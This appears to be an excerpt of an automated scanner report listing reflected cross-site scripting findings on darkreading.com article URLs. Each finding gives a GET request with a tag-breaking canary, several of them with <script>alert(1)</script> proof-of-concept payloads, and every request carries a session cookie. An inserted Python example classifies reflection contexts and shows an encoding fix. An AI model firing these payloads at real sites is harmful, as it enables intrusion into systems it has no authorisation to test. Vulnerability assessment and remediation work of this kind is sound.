Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1de0f"><a>4cf80fb700 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article1de0f"><a>4cf80fb700/225600438/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bdf69"><a>1c3d753006e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article/225600438bdf69"><a>1c3d753006e/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ec954'><a>0fefaa2c2a7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/225600438/index.htmlec954'><a>0fefaa2c2a7 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83ae6"><a>de34f9945a3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/225600438/index.html83ae6"><a>de34f9945a3 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<html>
<head>
<title>Tech Insi
...[SNIP]...
F%2Fwww.darkreading.com%2Fsecurity%2Farticle%2F225600438%2Findex.html83ae6%22%3E%3Ca%3Ede34f9945a3&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/security/article/225600438/index.html83ae6"><a>de34f9945a3">
...[SNIP]...
3.543. http://www.darkreading.com/security/article/225600438/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.darkreading.com
Path: /security/article/225600438/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6898a"><script>alert(1)</script>68e7edb99c0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/article/225600438/index.html?6898a"><script>alert(1)</script>68e7edb99c0=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7dc8f"><a>7c105799de9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article7dc8f"><a>7c105799de9/225700088/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94d18"><a>28365ea71af was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article/22570008894d18"><a>28365ea71af/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5cd62"><a>588ac057524 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/225700088/index.html5cd62"><a>588ac057524 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6e74f'><a>17972439907 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/225700088/index.html6e74f'><a>17972439907 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<html>
<head>
<title>Kaminsky
...[SNIP]...
<input type='hidden' name='article_url' value='http://www.darkreading.com/security/article/225700088/index.html6e74f'><a>17972439907'>
...[SNIP]...
3.548. http://www.darkreading.com/security/article/225700088/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.darkreading.com
Path: /security/article/225700088/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6100"><script>alert(1)</script>e07bbab2b75 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/article/225700088/index.html?c6100"><script>alert(1)</script>e07bbab2b75=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81602"><a>4ed896ecbdf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article81602"><a>4ed896ecbdf/225701534/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52daf"><a>ef75e0c2389 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article/22570153452daf"><a>ef75e0c2389/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe9ac"><a>dc496566411 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/225701534/index.htmlfe9ac"><a>dc496566411 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1a727'><a>35ae823d1ed was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/225701534/index.html1a727'><a>35ae823d1ed HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<html>
<head>
<title>Tech Insi
...[SNIP]...
<a href='http://www.darkreading.com/security/article/225701534/index.html1a727'><a>35ae823d1ed?fmid=12034'>
...[SNIP]...
3.553. http://www.darkreading.com/security/article/225701534/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.darkreading.com
Path: /security/article/225701534/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 852bd"><script>alert(1)</script>dad833f79d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/article/225701534/index.html?852bd"><script>alert(1)</script>dad833f79d=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9663"><a>5b75d38a4ef was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/articleb9663"><a>5b75d38a4ef/225701866/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af0b6"><a>6a756b8e2e8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article/225701866af0b6"><a>6a756b8e2e8/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5f918'><a>3bfeea6cd5b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/225701866/index.html5f918'><a>3bfeea6cd5b HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50fb2"><a>ecc055976b1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/225701866/index.html50fb2"><a>ecc055976b1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<html>
<head>
<title>Busted Al
...[SNIP]...
F%2Fwww.darkreading.com%2Fsecurity%2Farticle%2F225701866%2Findex.html50fb2%22%3E%3Ca%3Eecc055976b1&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/security/article/225701866/index.html50fb2"><a>ecc055976b1">
...[SNIP]...
3.558. http://www.darkreading.com/security/article/225701866/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.darkreading.com
Path: /security/article/225701866/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94e5e"><script>alert(1)</script>0743242781 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/article/225701866/index.html?94e5e"><script>alert(1)</script>0743242781=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a247"><a>8c022efe8a3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article1a247"><a>8c022efe8a3/225702192/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0ea1"><a>96404cac7f9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article/225702192f0ea1"><a>96404cac7f9/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 94dad'><a>643ad073b31 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/225702192/index.html94dad'><a>643ad073b31 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79179"><a>2115d49a26e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/225702192/index.html79179"><a>2115d49a26e HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<html>
<head>
<title>Six Messy
...[SNIP]...
F%2Fwww.darkreading.com%2Fsecurity%2Farticle%2F225702192%2Findex.html79179%22%3E%3Ca%3E2115d49a26e&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/security/article/225702192/index.html79179"><a>2115d49a26e">
...[SNIP]...
3.563. http://www.darkreading.com/security/article/225702192/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.darkreading.com
Path: /security/article/225702192/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24e9e"><script>alert(1)</script>8864cd82cb6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/article/225702192/index.html?24e9e"><script>alert(1)</script>8864cd82cb6=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
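Every finding in this part of the report rests on two facts: the canary comes back unmodified, and the quote character inside it matches the quote that encloses the attribute it lands in (a double-quote canary cannot close a single-quoted attribute, which is why the scanner submits both forms). The Python below is an added example, not part of this scan report or of the scanned site's code. It classifies where each reflected copy of a canary sits in a response, using the report's own canaries and the darkreading.com URLs from its response snippets, and then shows the output encoding that removes the finding. The tag wrapping the double-quoted value (snipped in the report), the login.example host and all function names are assumptions.

```python
"""Added example (not from the scan report or the scanned site): classify
where a reflected canary lands in an HTML response, decide whether its quote
can close the enclosing attribute, and show the encoding that fixes it.
Canaries and darkreading.com URLs are the report's; the wrapping tag for
the double-quoted case, login.example and all names here are assumed."""
import html
import re
from urllib.parse import quote

# Canaries from the report: hex prefix, one quote character, "><a>", hex suffix.
DQ_PAYLOAD = '79179"><a>2115d49a26e'
SQ_PAYLOAD = "b91ec'><a>923e17d3e45"

# Constructed around the report's double-quoted response snippet; the tag
# holding the attribute is snipped there, so an <a href="..."> is assumed.
# The value appears twice: once URL-encoded (harmless) and once raw.
DQ_BODY = (
    '<a href="https://login.example/?returnTo=http%3A%2F%2Fwww.darkreading.com'
    '%2Fsecurity%2Farticle%2F225702192%2Findex.html79179%22%3E%3Ca%3E2115d49a26e'
    '&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/security/'
    'article/225702192/index.html79179"><a>2115d49a26e">Log in</a>'
)
# The single-quoted finding, as the report's response snippet shows it.
SQ_BODY = (
    "<a href='http://www.darkreading.com/security/article/225702839/"
    "index.htmlb91ec'><a>923e17d3e45?fmid=12004'>"
)
# Constructed: the double-quote canary landing in that single-quoted attribute.
MISMATCH_BODY = (
    "<a href='http://www.darkreading.com/security/article/225702839/"
    "index.html79179\"><a>2115d49a26e?fmid=12004'>"
)


def reflection_context(body: str, payload: str) -> list:
    """One record per unmodified copy of `payload` in `body`: the syntactic
    context it sits in and whether the payload's quote closes the enclosing
    attribute value, which is what makes tag injection possible."""
    m = re.search(r"[\"']", payload)
    payload_quote = m.group(0) if m else None
    findings, start = [], 0
    while (idx := body.find(payload, start)) != -1:
        before = body[:idx]
        tag_open, tag_close = before.rfind("<"), before.rfind(">")
        quote_open = None
        if tag_open != -1 and tag_open > tag_close:
            # Inside a tag: replay its prefix to find which quote is open.
            for ch in before[tag_open:]:
                if quote_open is None and ch in "\"'":
                    quote_open = ch
                elif ch == quote_open:
                    quote_open = None
            context = f"attribute({quote_open})" if quote_open else "tag"
        else:
            context = "text"
        findings.append({
            "offset": idx,
            "context": context,
            "breaks_out": quote_open is not None and quote_open == payload_quote,
        })
        start = idx + len(payload)
    return findings


def breaks_out(body: str, payload: str) -> bool:
    """True if any reflected copy can close its attribute and start a new tag."""
    return any(f["breaks_out"] for f in reflection_context(body, payload))


def attr(value: str) -> str:
    """Attribute-encode a value; quote=True encodes both ' and ", so the
    result is safe inside either quoting style."""
    return html.escape(value, quote=True)


def safe_login_link(requested_url: str) -> str:
    """Hardened form of the login link: the requested URL is URL-encoded as a
    query value first, then the whole href is attribute-encoded."""
    target = ("https://login.example/?siteId=300001&successfulLoginRedirect="
              + quote(requested_url, safe=""))
    return f'<a href="{attr(target)}">Log in</a>'


def safe_article_link(requested_url: str) -> str:
    """Hardened form of the single-quoted link from the second snippet."""
    return f"<a href='{attr(requested_url + '?fmid=12004')}'>"


if __name__ == "__main__":
    for name, body, payload in (("double", DQ_BODY, DQ_PAYLOAD),
                                ("single", SQ_BODY, SQ_PAYLOAD),
                                ("mismatch", MISMATCH_BODY, DQ_PAYLOAD)):
        print(name, reflection_context(body, payload))
    url = "http://www.darkreading.com/security/article/225702192/index.html"
    print(safe_login_link(url + DQ_PAYLOAD))
```

Two details matter when reproducing these findings by hand. In the double-quoted sample the value is present twice, once URL-encoded and once raw; only the raw copy is an injection point, and a check that greps for the hex canary alone would count both. The hardened link encodes twice on purpose: URL-encoding makes the value safe as a query-string component, and attribute-encoding makes the whole href safe inside the quotes; html.escape with quote=True covers either quoting style, so the fix does not depend on which quote the template happens to use.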
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d5c1"><a>316dd9ee0aa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article1d5c1"><a>316dd9ee0aa/225702468/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
